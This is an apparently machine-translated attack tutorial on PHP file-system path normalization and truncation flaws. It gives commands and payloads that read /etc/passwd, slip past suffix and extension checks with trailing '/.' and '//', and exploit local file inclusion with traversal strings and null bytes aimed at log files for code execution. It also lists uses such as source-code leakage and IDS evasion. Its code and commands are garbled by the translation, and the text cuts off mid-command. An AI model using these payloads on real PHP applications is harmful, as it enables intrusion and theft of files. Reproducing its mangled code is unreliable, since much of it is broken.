PHP File System Attack wizard

Author: cnbird t00ls.net

I. php file system path normalization attack
Use // and/. In the path to open/etc/passwd/or/etc/passwd/. As a file.
Ii. Path Truncation Attack in PHP File System
PHP has a path truncation problem (a very evil means snprintf (). Only MAX_PATH can be used as the identification to open files or directories.
Iii. php file system process path normalization attack example
$ Php-r include ("/etc/passwd"); | head-n1
Root: x: 0: 0: root:/bin/bash

Soon we should know that a path is normalized to a standard

$ Cat/etc // passwd | head-n1
Root: x: 0: 0: root:/bin/bash
$ Cat/etc/./passwd | head-n1
Root: x: 0: 0: root:/bin/bash
We should have a good expectation for the following.
Php-r include ("/etc/passwd /");
You will find that this file will be normally included (it works on every single file system process that uses _ php_stream_fopen)

How do you find out something that is forced to pretend! Not to mention normal things. j8.
Php-r include ("/etc/passwd/."); // execution successful

Cat/etc/passwd /.
Cat:/etc/passwd/.: Not a directory
$ Cat/etc/passwd/
Cat:/etc/passwd/: Not a directory
All failed

Php-r include ("/etc/passwd //////");
Php-r include ("/etc/passwd /./././././.");

The ereg * () function can be exploited by the Null Byte vulnerability. preg _ * and character functions such as substr are safe.

Php-r if ($ argv [1]! = "/Etc/passwd") include ($ argv [1]);/etc/passwd | head-n1
Not working

$ Php-r if ($ argv [1]! = "/Etc/passwd") include ($ argv [1]);/etc // passwd | head-n1
Root: x: 0: 0: root:/bin/bash
Work now
$ Php-r if ($ argv [1]! = "/Etc/passwd") include ($ argv [1]);/etc // passwd | head-n1
Working again
$ Php-r if ($ argv [1]! = "/Etc/passwd") include ($ argv [1]);/etc/./passwd | head-n1
Root: x: 0: 0: root:/bin/bash
Won't you try again?
-Nologin-3.00 # php-r if ($ argv [1]! = "/Etc/passwd") include ($ argv [1]);/etc/./passwd | head-n1
Root: x: 0: 0: root:/bin/bash
Can you?
-Nologin-3.00 # php-r if ($ argv [1]! = "/Etc/passwd") include ($ argv [1]);/etc/./passwd/. | head-n1
Root: x: 0: 0: root:/bin/bash
I cannot do it today

In php, path normalization allows you to execute the preceding example, but the linux system command cat cannot
-Nologin-3.00 # cat/etc/./passwd /.
Cat:/etc/./passwd/.: Not a directory
Better examples are needed.
Php-r if (substr ($ argv [1],-6, 6 )! = "Passwd") include ($ argv [1]);/etc/passwd | head-n1
No job
Php-r if (substr ($ argv [1],-6, 6 )! = "Passwd") include ($ argv [1]);/etc // passwd | head-n1
It cannot work because it still ends with passwd.
Php-r if (substr ($ argv [1],-6, 6 )! = "Passwd") include ($ argv [1]);/etc/./passwd | head-n1
It cannot work because it still ends with passwd.
The above detection results indicate that we cannot bypass it directly.
Php-r if (substr ($ argv [1],-6, 6 )! = "Passwd") include ($ argv [1]);/etc/passwd/. | head-n1
But this example is successful,

Now the application of this path normalization attack is apparent. Especially for php, the following is a tangible example,
(An online file editing script)
Php-r if (substr ($ argv [1],-4, 4 )! = ". Php") echo ($ argv [1]). ""; ciccio.txt
Certainly cannot work.
Php-r if (substr ($ argv [1],-4, 4 )! = ". Php") echo ($ argv [1]). ""; ciccio. php/
Ciccio. php/
Wow, it's successful,
Php-r if (substr ($ argv [1],-4, 4 )! = ". Php") echo ($ argv [1]). ""; ciccio. php /.
Also succeeded
They can be applied
1. Write process bypass (file editor, file writer, etc)
2. Read function bypass (source code leakage)
3. IDS/IPS signature Bypass
In addition, there is another file upload vulnerability, such as uploading. php. xyz files. Thanks to apache's mod_mime ing feature haha)
Http://milw0rm.com/exploits/8060
Here

Iv. php file system path common Attack Description
Discover vulnerabilities by analyzing source code

$ Gdb/usr/bin/php
(Gdb) break open
Function "open" not defined.
Make breakpoint pending on future shared library load? (Y or [n]) y
Breakpoint 1 (open) pending.
(Gdb) r-r @ include ("/etc/passwd /.");
Starting program:/usr/bin/php-r @ include ("/etc/passwd /.");
[...]
[Switching to Thread 0xb7f2e6c0 (LWP 7264)]
Breakpoint 1, 0x41606820 in open () from/lib/libpthread. so.0
(Gdb) bt
#0 0x41606820 in open () from/lib/libpthread. so.0
#1 0x082142c7 in _ php_stream_fopen ()
#2 0xbff4c8cc in ?? ()
#3 0x09d20050 in ?? ()
#4 0x0000003b in ?? ()
#5 0x085e2504 in php_stream_stdio_ops ()
#6 0x00000000 in ?? ()

_ Php_stream_fopen () is defined in main/plain_wrapper.c. It is a very good function to start code analysis, which contains the following interesting things.
Streams/plain_wrapper.c-893: if (realpath = expand_filepath (filename, NULL TSRMLS_CC) = NULL ){

The expand_filepath () function is defined in main/fopen_wrappers.c, and the execution of expand_filepath_ex is also defined in main/fopen_wrappers.c.
This function contains snprintf, which causes the path to be truncated.
Main/fopen_wrappers.c-656: if (virtual_file_ex (& new_state, filepath, NULL, CWD_FILEPATH )){
Main/fopen_wrappers.c-657: free (new_state.cwd );
Main/fopen_wrappers.c-658: return NULL;
Main/fopen_wrappers.c-659 :}

Haha virtual_file_ex () is a defective function, which is defined in 482 rows of SRM/tsrm_virtual_cwd.c
Let's take a look at the error.
TSRM/tsrm_virtual_cwd.c-619: tok = NULL;
TSRM/tsrm_virtual_cwd.c-620: ptr = tsrm_strtok_r (path_copy, TOKENIZER_STRING, & tok );
TSRM/tsrm_virtual_cwd.c-621: while (ptr ){
TSRM/tsrm_virtual_cwd.c-622: ptr_length = strlen (ptr );
[...]
TSRM/tsrm_virtual_cwd.c-624: if (IS_DIRECTORY_UP (ptr, ptr_length )){
[...]
TSRM/tsrm_virtual_cwd.c-651:} else if (! IS_DIRECTORY_CURRENT (ptr, ptr_length )){
[...]
TSRM/tsrm_virtual_cwd.c-717 :}
TSRM/tsrm_virtual_cwd.c-718: ptr = tsrm_strtok_r (NULL, TOKENIZER_STRING, & tok );
TSRM/tsrm_virtual_cwd.c-719 :}
TOKENIZER_STRING, IS_DIRECTORY_UP and IS_DIRECTORY_CURRENT are defined in other source codes.
Grep "# define TOKENIZER" */*-n
Tsrm_virtual_cwd.c-82: # define TOKENIZER_STRING "/\"
Tsrm_virtual_cwd.c-103: # define TOKENIZER_STRING "/\"
Tsrm_virtual_cwd.c-106/TSRM: # define TOKENIZER_STRING "/"
Windows is defined in lines 82, 103 is netware, and 106 is for all other systems.

IS_DIRECTORY_UP and IS_DIRECTORY_CURRENT are defined below
$ Grep-P "# define (IS_DIRECTORY_UP * (| IS_DIRECTORY_CURRENT *()"*/*
-N-C2 | head-6
TSRM/tsrm_virtual_cwd.c-91: # define IS_DIRECTORY_UP (element, len)
TSRM/tsrm_virtual_cwd.c-92: (len> = 2 &&! Php_check_dots (element, len ))
[...]
TSRM/tsrm_virtual_cwd.c-94: # define IS_DIRECTORY_CURRENT (element, len)
TSRM/tsrm_virtual_cwd.c-95: (len = 1 & element [0] = .)
Then this code is very easy to understand. Here is the reason for the error of normalization attacks.

If/else-if structure does not consider the failure of one or two instances. At the same time, tsrm_strtok_r () will use each "/" to cut the path

It is too difficult to analyze the vulnerability without J8 writing. Check the instance.

V. php file system function path Truncation Attack
What is the purpose of this? Think carefully about the simple code below.
<? Php

// Im a classic LFI (Local File transfer sion) vulnerabiltiy!
Include ("des/". $ _ GET [library]. ". php ");

?>
Only one local file inclusion vulnerability exists, and RFI cannot be executed (RFI success requires "allow_url_fopen" and "allow_url_include" on "On" in php. ini)
This can be exploited in general. For example, it contains the. php file configured by the attacker (it requires the ability to upload and control the target file, including its file name)
For example
? Library = ../.../../home/www. uploadsite_on_shared_hosting.tld/www/static/attack
This is not a general environment, especially the use of LFI2RCE attacks. For example, the following article
Http://milw0rm.com/papers/260

? Library = ../.../../var/log/something. log % 00

Include ("events des/". urldecode (".../../var/log/something. log % 00"). ". php ");

Equivalent to include ("events des/.../var/log/something. log ");

This common problem occurs when magic_quotes filters out nullbytes and uses addslashes () to implicitly include all the GPC and SERVER inputs.
$ Php-r echo addslashes (chr (0 ));

$ Php-r echo ("des /". addslashes (urldecode (".. /.. /.. /var/log/something. log % 00 ")). ". php "); des /.. /.. /.. /var/